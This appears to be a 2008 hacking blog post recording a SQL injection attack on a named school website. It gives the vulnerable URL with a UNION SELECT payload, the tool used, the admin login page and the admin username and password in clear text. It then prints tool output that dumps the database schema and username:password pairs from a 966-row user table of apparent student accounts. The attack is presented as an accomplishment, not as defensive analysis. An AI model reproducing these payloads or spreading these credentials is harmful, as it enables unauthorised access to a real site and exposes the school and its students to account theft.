viperfx07 is here to blog about hacking, cracking, website, application, android, and many more.

Wednesday, October 15, 2008

[SQLi] http://sman1-boyolali.com

5:05 PM Posted by viperfx07 No comments


Tool --> schemafuzz.py v5.0
Admin login page --> http://sman1-boyolali.com/admin/
Admin usr:pwd --> admin:mastar1234
Dump:
[+] URL:http://sman1-boyolali.com/detailberita.php?id=6+AND+1=2+UNION+SELECT+0,sqli,2,3,4,5,6,7,8--
[+] Evasion Used: "+" "--"
[+] 12:40:16
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: sman1bo_smanbo
User: sman1bo@localhost
Version: 5.0.51a-community

[Database]: sman1bo_smanbo
[Table: Columns]
[0]admin: idadmin,username,password
[1]artikel: idartikel,idkategori,judul,isi_artikel,penulis,namapenulis,jam,tanggal,publik
[2]file: idfile,namafile,tanggal,jam,file,username,nama,keterangan
[3]gallery: idphoto,namaphoto,tanggal,jam,photo,keterangan
[4]guestbook: no_gb,nama,tanggal,jam,email,isi_gb
[5]kategori: idkategori,isi_kategori
[6]link: idlink,namalink,alamatweb
[7]polling: id_polling,tanggal,pertanyaan,A,B,C,D,E,jawabanA,jawabanB,jawabanC,jawabanD,jawabanE
[8]profil: idprofil,halaman,isi_halaman,tanggal,jam
[9]salam: idsalam,isi_salam,jam,tanggal
[10]user: iduser,username,nama,nmortu,password,status,photo,tempat_lahir,tgl_lahir,jk,th_masuk,alamat,telp,email,salam,ket

[-] [12:42:43]
[-] Total URL Requests 77
[-] Done

[+] URL:http://sman1-boyolali.com/detailberita.php?id=6+AND+1=2+UNION+SELECT+0,sqli,2,3,4,5,6,7,8--
[+] Evasion Used: "+" "--"
[+] 12:44:45
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: sman1bo_smanbo
User: sman1bo@localhost
Version: 5.0.51a-community
[+] Dumping data from database "sman1bo_smanbo" Table "user"
[+] Column(s) ['username', 'password']
[+] Number of Rows: 966

[0] admin:mastar1234:
[1] 13842:010645:
[2] 13843:010713:
[3] 13844:010742:
[4] 13841:010012:
[5] 13840:005849:
[6] 13839:005807:
[7] 13845:010810:
[8] 13846:010843:
[9] 13847:010903:
[10] 13848:010926:
[11] 13849:010948:
[12] 13850:011007:
-----cut here coz it's too many---

0 comments:

Post a Comment